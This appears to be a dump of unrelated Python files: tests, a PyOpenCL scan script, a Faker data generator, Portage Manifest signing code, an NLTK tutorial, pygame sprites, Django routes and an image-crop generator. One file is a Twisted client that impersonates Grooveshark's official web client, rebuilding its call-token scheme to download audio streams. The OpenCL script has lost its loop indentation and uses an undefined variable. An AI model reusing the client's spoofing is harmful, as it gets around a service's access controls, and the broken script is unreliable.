text stringlengths 8 6.05M |
|---|
import pytest, sys
sys.path.append("..")
from helpers_for_tests import run_args_on_parser as runargs
def add_config_to_args(args):
    """Prefix every argument list with the "config" subcommand (dev convenience)."""
    return [["config", *arg] for arg in args]
# Argument lists that are each missing at least one required positional,
# prefixed with the "config" subcommand they all target.
not_enough_args = [[], ["config_value"]]
not_enough_args = add_config_to_args(not_enough_args)
@pytest.mark.parametrize("args", not_enough_args)
def test_not_enough_args(args):
    """The parser must reject invocations that omit required arguments."""
    outcome = runargs(args)
    assert "the following arguments are required" in outcome.err
|
import pyopencl as cl
import pyopencl.array
import numpy
import numpy.linalg as la
import time
HARD_LOCATIONS = 2**20
DIMENSIONS = 256
#BUFFER_SIZE_EXPECTED_ACTIVE_HARD_LOCATIONS = 1300 #Compute analytically; prove it's safe...
maximum = (2**32)-1
HASH_TABLE_SIZE = 25033
print "HASH_TABLE_SIZE=", HASH_TABLE_SIZE #WHAT IS THE OPTIMUM HASH_TABLE_SIZE??
ACCESS_RADIUS_THRESHOLD = 104 #COMPUTE EXPECTED NUMBER OF num_ACTIVE_locations_found HARD LOCATIONS
import scan_toolkit as ocl_scan
import os
import pyopencl.array as cl_array
SDM_addresses = ocl_scan.load_address_space()
print SDM_addresses[0,0]
numpy.random.seed(seed=12345678)
ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
mem_flags = cl.mem_flags
OpenCL_code = ocl_scan.Get_Text_code ('GPU_Code_OpenCLv1_2.cl')
import os
import pyopencl.array as cl_array
os.environ['PYOPENCL_COMPILER_OUTPUT'] = '1'
#SDM_addresses = Create_Memory_Addresses()
print 'sending memory_addresses from host to compute device...'
memory_addresses_gpu = cl_array.to_device(queue, SDM_addresses)
distances_host = ocl_scan.Get_Hamming_Distances()
distances_gpu = ocl_scan.Get_Distances_GPU_Buffer(ctx)
prg = cl.Program(ctx, OpenCL_code).build()
num_times = 200
start = time.time()
for x in range(num_times):
bitstring = ocl_scan.Get_Random_Bitstring()
bitstring_gpu = ocl_scan.Get_Bitstring_GPU_Buffer(ctx, bitstring) #Optimize THIS!
count, active_hard_locations, distances = ocl_scan.Get_Active_Locations5(ctx, bitstring_gpu)
#active_hard_locations = Get_Active_Locations2(ctx)
#write_x_at_x_kanerva(active_hard_locations,bitstring)
#distances = Get_Active_Locations2(ctx)
Results_and_Statistics[x] = active_hard_locations.size
time_elapsed = (time.time()-start)
print Results_and_Statistics[Results_and_Statistics !=0].min(), " the minimum of HLs found should be 1001"
print Results_and_Statistics[Results_and_Statistics !=0].mean(), "the mean of HLs found should be 1119.077"
print Results_and_Statistics[Results_and_Statistics !=0].max(), "the max of HLs found should be 1249"
print '\n Seconds to Scan 2^20 Hard Locations', num_times,'times:', time_elapsed
print distances
print active_hard_locations
print active_hard_locations.size
sum = numpy.sum(Results_and_Statistics)
|
import pyodbc
import CRUDController
import datetime
import random
from faker import Faker
"""
Controller Operator class; responsible for generating huge amounts of data.
"""
class ControllerOperator:
    """Drives a CRUDController to generate large volumes of fake data.

    Faker supplies names and text; rows the database rejects are
    reported and skipped so a long generation run never aborts.
    """

    # Placeholders; real values are assigned in __init__.
    controller = None
    fake = None

    def __init__(self, db):
        self.controller = CRUDController.Controller(db)
        self.fake = Faker()

    def close(self):
        """Release the underlying database connection."""
        self.controller.close()

    def _insert_many(self, amount, create_fn):
        # Shared loop for the insert_* helpers: call create_fn `amount`
        # times, skipping rows the database rejects.
        for _ in range(amount):
            try:
                create_fn()
            except pyodbc.ProgrammingError:
                print('Weird name')
            except pyodbc.IntegrityError:
                print('Constraint')

    def insert_participants(self, amount):
        self._insert_many(amount, self.controller.create_participant)

    def insert_companies(self, amount):
        self._insert_many(amount, self.controller.create_company)

    def insert_individuals(self, amount):
        self._insert_many(amount, self.controller.create_individual)

    def get_all_customers(self):
        return self.controller.get_all_customers()

    def get_all_workshops(self):
        return self.controller.get_all_workshops()

    def get_all_participants(self):
        return self.controller.get_all_participants()

    def get_all_conferences(self):
        return self.controller.get_all_conferences()

    def insert_conference(self, date):
        """Create one conference on *date* with a fake name and description."""
        name = self.fake.company()
        # strip commas from the generated company name (presumably to keep
        # downstream handling simple -- confirm against create_conference)
        name = ''.join(name.split(','))
        print(name)
        description = self.fake.text()
        price_per_date = random.randint(5, 10) * 10  # 50..100 in steps of 10
        self.controller.create_conference(name, description, date, price_per_date)

    def generate_conferences(self, n, start_date):
        """Create *n* conferences spaced 15-18 days apart, starting at start_date."""
        date = start_date
        for _ in range(n):
            self.insert_conference(date)
            date += datetime.timedelta(days=random.randint(15, 18))

    def create_company_booking(self):
        company_id = self.controller.get_random_company_id()
        self.controller.create_conference_booking(company_id)

    def generate_company_bookings(self, n):
        for _ in range(n):
            self.create_company_booking()

    def create_individual_booking(self):
        individual_id = self.controller.get_random_individual_id()
        self.controller.create_conference_booking(individual_id)

    def generate_individual_bookings(self, n):
        for _ in range(n):
            self.create_individual_booking()
|
# Copyright 2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import errno
import re
import subprocess
from portage import os
from portage import _unicode_encode, _encodings
from portage.const import MANIFEST2_IDENTIFIERS
from portage.util import (atomic_ofstream, grablines,
shlex_split, varexpand, writemsg)
from portage.util._async.PopenProcess import PopenProcess
from _emerge.CompositeTask import CompositeTask
from _emerge.PipeReader import PipeReader
from .ManifestProcess import ManifestProcess
class ManifestTask(CompositeTask):
    """Regenerate a package's Manifest and optionally GPG-sign it.

    Runs a ManifestProcess for self.cp; when signing is configured
    (gpg_cmd is set), (re)signs the Manifest unless it already carries a
    signature from force_sign_key.
    """

    __slots__ = ("cp", "distdir", "fetchlist_dict", "gpg_cmd",
        "gpg_vars", "repo_config", "force_sign_key", "_manifest_path")

    _PGP_HEADER = b"BEGIN PGP SIGNED MESSAGE"
    _manifest_line_re = re.compile(r'^(%s) ' % "|".join(MANIFEST2_IDENTIFIERS))
    _gpg_key_id_re = re.compile(r'^[0-9A-F]*$')
    # Accepted hex lengths for short/long key ids and fingerprints.
    _gpg_key_id_lengths = (8, 16, 24, 32, 40)

    def _start(self):
        self._manifest_path = os.path.join(self.repo_config.location,
            self.cp, "Manifest")
        manifest_proc = ManifestProcess(cp=self.cp, distdir=self.distdir,
            fetchlist_dict=self.fetchlist_dict, repo_config=self.repo_config,
            scheduler=self.scheduler)
        self._start_task(manifest_proc, self._manifest_proc_exit)

    def _manifest_proc_exit(self, manifest_proc):
        """Decide whether the regenerated Manifest needs a (new) signature."""
        self._assert_current(manifest_proc)
        if manifest_proc.returncode not in (os.EX_OK, manifest_proc.MODIFIED):
            self.returncode = manifest_proc.returncode
            self._current_task = None
            self.wait()
            return
        modified = manifest_proc.returncode == manifest_proc.MODIFIED
        sign = self.gpg_cmd is not None
        if not modified and sign:
            sign = self._need_signature()
        if not sign and self.force_sign_key is not None \
            and os.path.exists(self._manifest_path):
            # Already signed: verify the signing key matches force_sign_key.
            self._check_sig_key()
            return
        if not sign or not os.path.exists(self._manifest_path):
            self.returncode = os.EX_OK
            self._current_task = None
            self.wait()
            return
        self._start_gpg_proc()

    def _check_sig_key(self):
        """Run `gpg --verify` on the Manifest, capturing its combined output."""
        null_fd = os.open('/dev/null', os.O_RDONLY)
        popen_proc = PopenProcess(proc=subprocess.Popen(
            ["gpg", "--verify", self._manifest_path],
            stdin=null_fd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT),
            pipe_reader=PipeReader())
        os.close(null_fd)
        popen_proc.pipe_reader.input_files = {
            "producer" : popen_proc.proc.stdout}
        self._start_task(popen_proc, self._check_sig_key_exit)

    @staticmethod
    def _parse_gpg_key(output):
        """
        Returns the first token which appears to represent a gpg key
        id, or None if there is no such token.
        """
        regex = ManifestTask._gpg_key_id_re
        lengths = ManifestTask._gpg_key_id_lengths
        for token in output.split():
            m = regex.match(token)
            if m is not None and len(m.group(0)) in lengths:
                return m.group(0)
        return None

    @staticmethod
    def _normalize_gpg_key(key_str):
        """
        Strips leading "0x" and trailing "!", and converts to uppercase
        (intended to be the same format as that in gpg --verify output).
        """
        key_str = key_str.upper()
        if key_str.startswith("0X"):
            key_str = key_str[2:]
        key_str = key_str.rstrip("!")
        return key_str

    def _check_sig_key_exit(self, proc):
        """Re-sign only when the existing signature's key differs from force_sign_key."""
        self._assert_current(proc)
        parsed_key = self._parse_gpg_key(
            proc.pipe_reader.getvalue().decode('utf_8', 'replace'))
        if parsed_key is not None and \
            self._normalize_gpg_key(parsed_key) == \
            self._normalize_gpg_key(self.force_sign_key):
            self.returncode = os.EX_OK
            self._current_task = None
            self.wait()
            return
        if self._was_cancelled():
            self.wait()
            return
        self._strip_sig(self._manifest_path)
        self._start_gpg_proc()

    @staticmethod
    def _strip_sig(manifest_path):
        """
        Strip an existing signature from a Manifest file.
        """
        line_re = ManifestTask._manifest_line_re
        lines = grablines(manifest_path)
        f = None
        try:
            f = atomic_ofstream(manifest_path)
            for line in lines:
                # Keep only real manifest entries; signature lines are dropped.
                if line_re.match(line) is not None:
                    f.write(line)
            f.close()
            f = None
        finally:
            # On any failure, roll the atomic write back.
            if f is not None:
                f.abort()

    def _start_gpg_proc(self):
        """Launch the configured gpg command with $FILE expanded to the Manifest."""
        gpg_vars = self.gpg_vars
        if gpg_vars is None:
            gpg_vars = {}
        else:
            gpg_vars = gpg_vars.copy()
        gpg_vars["FILE"] = self._manifest_path
        gpg_cmd = varexpand(self.gpg_cmd, mydict=gpg_vars)
        gpg_cmd = shlex_split(gpg_cmd)
        gpg_proc = PopenProcess(proc=subprocess.Popen(gpg_cmd))
        self._start_task(gpg_proc, self._gpg_proc_exit)

    def _gpg_proc_exit(self, gpg_proc):
        """Move the detached .asc output over the Manifest after signing."""
        if self._default_exit(gpg_proc) != os.EX_OK:
            self.wait()
            return
        rename_args = (self._manifest_path + ".asc", self._manifest_path)
        try:
            os.rename(*rename_args)
        except OSError as e:
            # BUG FIX: this was `"..." % rename_args + (e,)` -- because %
            # binds tighter than +, it formatted a 3-placeholder string with
            # a 2-tuple and then tried to concatenate a tuple onto a string,
            # raising TypeError instead of logging.  The parentheses below
            # apply % to the full 3-tuple.
            writemsg("!!! rename('%s', '%s'): %s\n" % (rename_args + (e,)),
                noiselevel=-1)
            try:
                os.unlink(self._manifest_path + ".asc")
            except OSError:
                pass
            self.returncode = 1
        else:
            self.returncode = os.EX_OK
        self._current_task = None
        self.wait()

    def _need_signature(self):
        """True when the Manifest exists but lacks a PGP signature header."""
        try:
            with open(_unicode_encode(self._manifest_path,
                encoding=_encodings['fs'], errors='strict'), 'rb') as f:
                return self._PGP_HEADER not in f.readline()
        except IOError as e:
            # A missing or stale Manifest cannot be signed; anything else
            # is unexpected and propagates.
            if e.errno in (errno.ENOENT, errno.ESTALE):
                return False
            raise
|
# coding: utf-8
# # Introduction to NLP in Python
# ### Representing text:
# In[1]:
s1 = 'Bonjour tout le monde'
#print s1
# In[2]:
print s1
# In[3]:
s2 = "Hello world"
print s2
# ### A string behaves like an array: we can take its length and access elements by index
# In[5]:
print len(s2)
# In[6]:
print s1[0]
# In[8]:
s1[0:9]
# In[6]:
print s1[5:]
# In[34]:
print s1[:7]
# ### As in R, Python lets us convert characters to lower or upper case
# In[7]:
s3 = s1.upper()
print s3
# In[9]:
s4 = s3.lower()
print s4
# In[10]:
print s4.find('o')
# ### As in other programming languages, concatenation uses the "+" operator
# In[23]:
s1 = 'Bonjour'
s2 = 'tout'
s3 = 'le'
s4 = 'monde'
s5 = s1+s2+s3+s4
print s5
# In[24]:
s0 = ' '
s6 = s1+s0+s2+s0+s3+s0+s4
print s6
# #### The * operator
#
# In[25]:
s7 = s6*3
print s7
# For text processing we prefer to have a sentence as a list of strings
# In[33]:
s1 = "L'essentiel est \"invisible\" pour les yeux."
s1 = s1.upper()
# In[34]:
print s1
print len(s1)
# In[35]:
s1 = s1.split()
print s1
# ### Words are represented by strings
# ### sentences will be represented by lists of strings
# In[26]:
print s1.index('pour')
# In[28]:
print 'est' in s1
# In[29]:
print len(s1)
# ### Normalizing the text
# In[36]:
s1_min = [w.lower() for w in s1]
print s1_min
# In[37]:
s6 = 'Bonjour'
# In[42]:
s6.endswith('oul')
# # NLTK : Natural Language Toolkit
#
# In[43]:
import nltk
# In[44]:
s1 = 'Hello, my name is Erick'
s2 = s1.split()
# In[45]:
print s2
# ## Tokenization with nltk
# In[47]:
nltk.word_tokenize(s1)
# #### What is the difference between the nltk tokenizer and a string's split function?
# ### Stopwords
# In[48]:
from nltk.corpus import stopwords
# In[49]:
frenchStopWords = stopwords.words('french')
englishStopWords = stopwords.words('english')
spanishStopWords = stopwords.words('spanish')
# In[50]:
def printListOfWords(listOfWords):
    # Print each word on its own line.
    for w in listOfWords:
        print w
    return
# In[ ]:
# In[6]:
#printListOfWords(frenchStopWords)
# In[ ]:
# In[5]:
#printListOfWords(spanishStopWords)
# In[4]:
#printListOfWords(englishStopWords)
# In[54]:
from nltk.book import *
# In[138]:
#print text7.tokens
# ### Counting the vocabulary:
# In[122]:
#print text7.tokens
# In[123]:
print text7.count('said')
# ### Word frequency distribution
# In[60]:
frecList = FreqDist(text7)
frecList ## the outcomes are the word counts
# In[61]:
vocabulary = frecList.keys()
print vocabulary[:50]
# In[62]:
frecList.plot(50,cumulative=False)
# ## but the plot shows many stop words... so what can we do?
# In[63]:
# 1. normalize the text
text7_m = [w.lower() for w in text7]
# In[139]:
#print text7_m
# In[64]:
text7_SansStW = [w for w in text7_m if w not in englishStopWords]
# In[65]:
frecList2 = FreqDist(text7_SansStW,)
# In[66]:
vocabulary2 = frecList2.keys()
# In[3]:
#vocabulary2[:50]
# In[68]:
frecList2.plot(50,cumulative=False)
# ## Stemmers in Python
# In[70]:
from nltk.stem.porter import *
# In[ ]:
# In[71]:
stemmer = PorterStemmer()
# In[72]:
plurals = ['caresses', 'flies', 'dies', 'mules', 'denied',
           'died', 'agreed', 'owned', 'humbled', 'sized',
           'meeting', 'stating', 'siezing', 'itemization',
           'sensational', 'traditional', 'reference', 'colonizer',
           'plotted']
singular = []
# In[73]:
for plural in plurals:
    singular.append(stemmer.stem(plural))
# In[74]:
print singular
# In[75]:
from nltk.stem.snowball import SnowballStemmer
# In[76]:
print(" ".join(SnowballStemmer.languages))
# In[77]:
steemerFr = SnowballStemmer("french")
# In[78]:
steemerFr.stem('finissons')
# In[83]:
steemerFr.stem(u'chats')
# ## The WordNet lemmatizer
# In[84]:
wnl = nltk.WordNetLemmatizer()
# In[85]:
[wnl.lemmatize(t) for t in plurals]
# In[86]:
wnl.lemmatize('lions')
# ## Part-of-speech tagging
# In[87]:
text = "Jonh gave the book to Anne"
text = nltk.word_tokenize(text)
print text
# In[88]:
tag_text = nltk.pos_tag(text)
# In[94]:
tag_text[0][1]
# In[89]:
text7_pos = nltk.pos_tag(text7_SansStW)
# In[1]:
#print text7_pos
#choses_elever = [',','%']
# In[117]:
#[w for w in text7_m if w not in englishStopWords]
verbs_t = [t for t in text7_pos if t[1].startswith('M')]
# In[2]:
#print verbs_t
# In[119]:
verbs =[w[0] for w in verbs_t]
# In[120]:
frecVerbs = FreqDist(verbs)
# In[121]:
frecVerbs.plot(50,cumulative=False)
# In[161]:
frecVebsK = frecVerbs.keys()
# In[101]:
nouns_t = [t for t in text7_pos if t[1].startswith('N')]
print len(nouns_t)
nouns =[w[0] for w in nouns_t]
frecNouns = FreqDist(nouns)
frecNouns.plot(50, cumulative=False)
# See the reference: Natural Language Processing with Python, by Steven Bird, Ewan Klein, and Edward Loper
# In[ ]:
|
import os
import functools
import hashlib
import json
import random
import uuid
import urllib
from twisted.python import runtime, log
from twisted.internet import defer
from twisted.web import error, client
# Always use https, since getting a token requires it.
API_URL = "https://cowbell.grooveshark.com/"
ART_BASE_URL = "http://beta.grooveshark.com/static/amazonart/m"
class JSONFault(Exception): pass  # raised when the API answers with a 'fault' payload
### TWISTED MONKEY PATCHING
### SHIELD YOUR EYES, #twisted!
# HTTPClient, when using afterFoundGet on a 302,
# handles 301 twice, leading to two requests
# to the server
def stupid_bug_handleStatus_302(self):
    # With afterFoundGet, treat the redirect like a 303 (re-issue as GET);
    # otherwise fall back to the stock 301 handling.
    if self.afterFoundGet:
        self.handleStatus_303()
    else:
        self.handleStatus_301()
# NOTE(review): the attribute name below ('handleStatus203') looks like a
# typo for 'handleStatus_302'; as written this patch appears never to be
# invoked by twisted -- confirm before relying on it.
client.HTTPPageGetter.handleStatus203 = stupid_bug_handleStatus_302
# I have to do this because downloadPage/HTTPDownloader
# doesn't support afterFoundGet, which is required
# to download from the Akamai servers
def stupid_bug_HTTPDownloader(factory=client.HTTPDownloader):
    # Wrap the HTTPDownloader factory so every instance gets afterFoundGet=True.
    def inner(*a, **kw):
        I = factory(*a, **kw)
        I.afterFoundGet = True
        return I
    return inner
client.HTTPDownloader = stupid_bug_HTTPDownloader()
class GroovesharkAPI(object):
    """Asynchronous (Twisted) client for Grooveshark's unofficial JSON API.

    Call initialize() first: it obtains a PHP session id, a communication
    token, and the client country used by subsequent calls.
    """

    def __init__(self, url=API_URL):
        self.url = url
        # ok, I'm just copying the stuff from the requests.
        self.headers = dict(client="gslite", clientRevision="20100412.85",
            privacy=1, uuid=str(uuid.uuid4()).upper())
        # Content-Type headers for usual stuff.
        self.jsonContent = {"Content-Type":"application/json"}
        self.formContent = {"Content-Type":"application/x-www-form-urlencoded"}
        # shhh... pretend to be a desktop browser.
        self.httpHeaders = {"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100721 Firefox/3.6.8"}
        # Timestamp after which the communication token must be refreshed.
        self.tokenExpire = None
        self.country = None

    @defer.inlineCallbacks
    def initialize(self):
        """Perform the full session handshake."""
        yield self.fetchSessionID()
        yield self.fetchToken()
        # I'm not sure if you *need* a country,
        # but the official client uses it.
        yield self.fetchCountry()

    def getURL(self, script, *args, **kwargs):
        """Build an API URL: positional args are quoted and '&'-joined, kwargs urlencoded."""
        return "%s%s?%s%s" % (self.url, script,
            '&'.join(map(urllib.quote, args)), urllib.urlencode(kwargs))

    @defer.inlineCallbacks
    def fetchSessionID(self):
        """Obtain a PHPSESSID cookie and store it for all later requests."""
        cookies = dict()
        result = yield client.getPage(self.url, method="POST", cookies=cookies)
        self.headers['session'] = cookies['PHPSESSID']
        self.httpHeaders['Cookie'] = "PHPSESSID=%s" % (cookies['PHPSESSID'],)

    @defer.inlineCallbacks
    def fetchToken(self):
        """Fetch a communication token; treated as valid for 25000 seconds."""
        self.rawToken = yield self.send('getCommunicationToken',
            dict(secretKey=hashlib.md5(self.headers['session']).hexdigest()),
            tokenRequired=False)
        self.tokenExpire = runtime.seconds() + 25000

    @defer.inlineCallbacks
    def fetchCountry(self):
        self.country = yield self.send('getCountry', script="more.php")

    @defer.inlineCallbacks
    def generateCallToken(self, action):
        """Derive the per-call token from the action, the raw token and a random seed."""
        if runtime.seconds() > self.tokenExpire:
            yield self.fetchToken()
        seed = "%06x" % random.getrandbits(24)
        defer.returnValue(seed + hashlib.sha1("%s:%s:quitStealinMahShit:%s" % (
            action, self.rawToken, seed)).hexdigest())

    @defer.inlineCallbacks
    def send(self, action, params=None, script="service.php", tokenRequired=True):
        """POST one API call; return its 'result' field or raise JSONFault."""
        headers = dict(self.headers)
        # BUG FIX: params defaults to None, but the country branch below
        # mutates it -- any parameterless call made after fetchCountry()
        # succeeded used to raise TypeError.  Normalize to a dict up front
        # (the request now sends {} instead of null when params is omitted).
        if params is None:
            params = {}
        dataDict = dict(method=action, parameters=params, header=headers)
        if self.country:
            params['country'] = self.country
        if tokenRequired:
            dataDict['header']['token'] = yield self.generateCallToken(action)
        dataJSON = json.dumps(dataDict)
        resultJSON = yield client.getPage(self.getURL(script, action), method="POST",
            headers=dict(self.httpHeaders, **self.jsonContent), postdata=dataJSON)
        resultDict = json.loads(resultJSON)
        result = resultDict.get('result')
        if result is not None:
            defer.returnValue(result)
        fault = JSONFault(resultDict['fault']['message'])
        fault.code = resultDict['fault']['code']
        raise fault

    @defer.inlineCallbacks
    def search(self, query, type="Songs"):
        """Search the catalog; *type* is e.g. "Songs"."""
        result = yield self.send('getSearchResultsEx',
            dict(query=query, type=type), "more.php")
        result = result['result']
        defer.returnValue(result)

    @defer.inlineCallbacks
    def getStreamingInfo(self, songID):
        """Resolve a song id to its streaming server ip and stream key."""
        result = yield self.send('getStreamKeyFromSongIDEx',
            dict(songID=songID, prefetch=False, mobile=False), "more.php")
        defer.returnValue(result)

    def downloadSong(self, streamingInfo, filename):
        """Download the audio stream to *filename*; no-op Deferred for unplayable songs."""
        if streamingInfo not in ([], None): # For unplayable songs in the web client
            url = "http://%s/stream.php" % str(streamingInfo['ip'])
            postdata = "streamKey=" + str(streamingInfo['streamKey'])
            return client.downloadPage(url, filename, client.HTTPDownloader,
                method="POST", postdata=postdata, headers=self.formContent)
        return defer.succeed(True)

    def downloadCoverArt(self, coverArtFilename, filename):
        """Download cover art; returns None when the API reports no art."""
        _, extension = os.path.splitext(coverArtFilename)
        if coverArtFilename not in (u'None', u'False'):
            return client.downloadPage(ART_BASE_URL + str(coverArtFilename),
                filename + extension)

    def downloadSongID(self, songID, filename):
        """Resolve *songID* and download it to *filename*."""
        print ("Downloading %s to %s" % (songID, filename))
        return self.getStreamingInfo(songID).addCallbacks(
            functools.partial(self.downloadSong, filename=filename))

    def downloadSongInfo(self, songInfo, filename, artFilename=None):
        """Download a song and, when requested and available, its cover art."""
        songID = songInfo[u'SongID']
        L = []
        if artFilename and songInfo.get(u'CoverArtFilename'):
            d = self.downloadCoverArt(songInfo[u'CoverArtFilename'],
                artFilename)
            if d: L.append(d)
        L.append(self.downloadSongID(songID, filename))
        return defer.DeferredList(L)

    @defer.inlineCallbacks
    def getPlaylist(self, playlistID):
        """Return the list of songs in a playlist."""
        result = yield self.send('playlistGetSongs',
            dict(playlistID=playlistID), "more.php")
        defer.returnValue(result['Songs'])
|
import pygame
class Platform(pygame.sprite.Sprite):
    """A solid platform tile.

    The class attributes define the pixel size of every block created.
    """
    width = 32
    height = 32

    def __init__(self, x, y):
        pygame.sprite.Sprite.__init__(self)
        self.color = "#FF6262"
        try:
            self.image = pygame.image.load("img/block/platform.png")
        except pygame.error:
            # Missing asset: fall back to a plain colored square.
            fallback = pygame.Surface((self.width, self.height))
            fallback.fill(pygame.Color(self.color))
            self.image = fallback
        self.rect = pygame.Rect(x, y, self.width, self.height)
class Gate(pygame.sprite.Sprite):
    """The portal tile.

    Class attributes mirror those of Platform and give the tile size.
    """
    width = 32
    height = 32

    def __init__(self, x, y):
        pygame.sprite.Sprite.__init__(self)
        self.color = "#FFFFFF"
        try:
            loaded = pygame.image.load("img/block/gate.png")
            # The sprite on disk may be any size; normalize it to 32x32.
            self.image = pygame.transform.scale(loaded, (32, 32))
        except pygame.error:
            # Missing asset: fall back to a plain colored square.
            fallback = pygame.Surface((self.width, self.height))
            fallback.fill(pygame.Color(self.color))
            self.image = fallback
        self.rect = pygame.Rect(x, y, self.width, self.height)
from django.conf.urls import url
from rest_framework.authtoken import views as drf_views
from . import views
app_name = 'Rank'
# Route table for the Rank app.  (?P<url>\w+) captures a contest identifier.
urlpatterns = [
    # auth/ : DRF token authentication
    url(r'^auth/$', drf_views.obtain_auth_token, name='auth'),
    # isloggedin/
    url(r'^isloggedin/$',views.IsLoggedIn.as_view(), name = 'is-logged-in'),
    # signup/
    url(r'^signup/$',views.SignUp.as_view(), name = 'sign-up'),
    # signin/
    url(r'^signin/$',views.SignIn.as_view(), name = 'sign-in'),
    # new_contest/
    url(r'^new_contest/$',views.NewContest.as_view(), name = 'new_contest'),
    # new_private_contest/
    url(r'^new_private_contest/$',views.NewPrivateContest.as_view(), name = 'new_private_contest'),
    # rank_vote/<url>/
    url(r'^rank_vote/(?P<url>\w+)/$',views.RankVote.as_view(), name = 'rank_vote'),
    # rank_result/<url>/
    url(r'^rank_result/(?P<url>\w+)/$',views.RankResult.as_view(), name = 'rank_result'),
    # rank_private_vote/<url>/
    url(r'^rank_private_vote/(?P<url>\w+)/$',views.RankPrivateVote.as_view(), name = 'rank_private_vote'),
    # my_rtlist/
    url(r'^my_rtlist/$',views.MyRTList.as_view(), name = 'my-rtlist'),
    # my_admin/
    url(r'^my_admin/$',views.MyAdmin.as_view(), name = 'my-admin'),
    # rank_title/<url>/
    url(r'^rank_title/(?P<url>\w+)/$',views.RankTitle.as_view(), name = 'rank-title'),
    # rank_tanker/<url>/
    url(r'^rank_tanker/(?P<url>\w+)/$',views.RankTanker.as_view(), name = 'rank-tanker'),
    # private_rank_title/<url>/
    url(r'^private_rank_title/(?P<url>\w+)/$',views.PrivateRankTitle.as_view(), name = 'private-rank-title'),
    # forgot_password/
    url(r'^forgot_password/$',views.ResetPasswordEmail.as_view(), name = 'reset-password-email'),
]
import numpy as np
import cv2 as cv
import pandas as pd
import random
from math import ceil
from sklearn.utils import shuffle
dt = np.dtype(np.float32)  # dtype shared by image tensors and target boxes

def generator(batch_size=50):
    """Endless generator of training batches from the day/night clip dataset.

    Each yielded batch holds 100 samples: 64x64 RGB crops (scaled to [0,1],
    shape (1, 64, 64, 3)) paired with targets [present, x1, y1, x2, y2].
    Positives come from annotated boxes; negatives are blob-detector
    keypoints far from any box.

    NOTE(review): despite its name, `batch_size` controls how many
    100-sample batches are yielded per pass of the outer while-loop, not
    the size of a batch -- confirm against the training code.
    """
    while True:
        for j in range(batch_size):
            Xs = []
            Ys = []
            count = 0
            while count < 100:
                # Pick a random day (0) or night (1) clip and read its annotations.
                day_or_night = random.randint(0,1)
                if day_or_night == 0:
                    folder_day = random.randint(1,13)
                    path_0 = '/../data/archive/Annotations/Annotations/dayTrain/dayClip{}/frameAnnotationsBOX.csv'.format(folder_day)
                    csv_file = pd.read_csv(filepath_or_buffer=path_0, sep=';')
                else:
                    folder_night = random.randint(1,5)
                    path_0 = '/../data/archive/Annotations/Annotations/nightTrain/nightClip{}/frameAnnotationsBOX.csv'.format(folder_night)
                    csv_file = pd.read_csv(filepath_or_buffer=path_0, sep=';')
                # choose a random annotated picture from this clip
                i = random.randint(0, len(csv_file.iloc[:,0].unique())-1)
                full_pic_name = csv_file.iloc[:,0].unique()[i]
                pic_name = csv_file.iloc[:,0].unique()[i].split('/')[1]
                if day_or_night == 0:
                    path_to_img = '/../data/archive/dayTrain/dayTrain/dayClip{}/frames/'.format(folder_day) + pic_name
                else:
                    path_to_img = '/../data/archive/nightTrain/nightTrain/nightClip{}/frames/'.format(folder_night) + pic_name
                img = cv.imread(path_to_img)
                img = cv.cvtColor(img, cv.COLOR_BGR2RGB)
                # one image can carry several annotated boxes
                number_of_same_pic = len(csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[:,0])
                # pad by 200px so random crops around border boxes stay in-bounds
                img = cv.copyMakeBorder(img, 200, 200, 200, 200, cv.BORDER_REPLICATE)
                # blob detection: bright spots used as negative-sample centers
                params = cv.SimpleBlobDetector_Params()
                params.minThreshold = 1
                params.maxThreshold = 255
                params.filterByArea = True
                params.minArea = 100
                params.filterByCircularity = False
                params.filterByConvexity = False
                params.filterByInertia = False
                detector = cv.SimpleBlobDetector_create(params)
                keypoints = detector.detect(img)
                # (the unused `kps = np.array(...)` copy was removed)
                for i in range(number_of_same_pic):
                    if count < 100:
                        # box corners; +200 compensates for the border padding
                        x1 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,2]+200
                        y1 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,3]+200
                        x2 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,4]+200
                        y2 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,5]+200
                        # Drop keypoints within 50px of this box so negatives
                        # exclude annotated regions.  PERF FIX: the original
                        # re-ran this idempotent filter once per remaining
                        # keypoint inside a `for key in keypoints` loop; a
                        # single pass is equivalent and much cheaper.
                        keypoints = [key for key in keypoints if not ((x1-50 < key.pt[0] < x2+50) and (y1-50 < key.pt[1] < y2+50))]
                        # random crop offsets that keep the whole box inside a 200px window
                        random_crop_x1 = random.randint(0, 200-(x2-x1))
                        random_crop_x2 = 200 - random_crop_x1
                        random_crop_y1 = random.randint(0, 200-(y2-y1))
                        random_crop_y2 = 200 - random_crop_y1
                        cropped_img = img[y1-random_crop_y1:y2+random_crop_y2, x1-random_crop_x1:x2+random_crop_x2]
                        new_x1 = random_crop_x1
                        new_y1 = random_crop_y1
                        new_x2 = new_x1 + (x2-x1)
                        new_y2 = new_y1 + (y2-y1)
                        # rescale the box coordinates into the 64x64 frame
                        w = cropped_img.shape[1]
                        h = cropped_img.shape[0]
                        Rx = (64 / w)
                        Ry = (64 / h)
                        x1 = ceil(new_x1*Rx)
                        y1 = ceil(new_y1*Ry)
                        x2 = ceil(new_x2*Rx)
                        y2 = ceil(new_y2*Ry)
                        cropped_img = cv.resize(cropped_img, (64, 64))
                        cropped_img = cropped_img.reshape(1, 64, 64, 3)
                        box = np.array([1, x1, y1, x2, y2], dtype=dt)
                        Xs.append(np.array(cropped_img, dtype=dt) / 255.)
                        Ys.append(box)
                        count += 1
                # keep at most 4 surviving keypoints as negative samples
                keypoints = keypoints[-5:-1]
                for k in range(len(keypoints)):
                    if count < 100:
                        # 200x200 crop centered on the keypoint
                        k_x1 = int(round(keypoints[k].pt[0]-100))
                        k_y1 = int(round(keypoints[k].pt[1]-100))
                        k_x2 = int(round(keypoints[k].pt[0]+100))
                        k_y2 = int(round(keypoints[k].pt[1]+100))
                        cropped_img = img[k_y1:k_y2, k_x1:k_x2]
                        cropped_img = cv.resize(cropped_img, (64, 64))
                        cropped_img = cropped_img.reshape(1, 64, 64, 3)
                        box = np.array([0, 0, 0, 0, 0], dtype=dt)
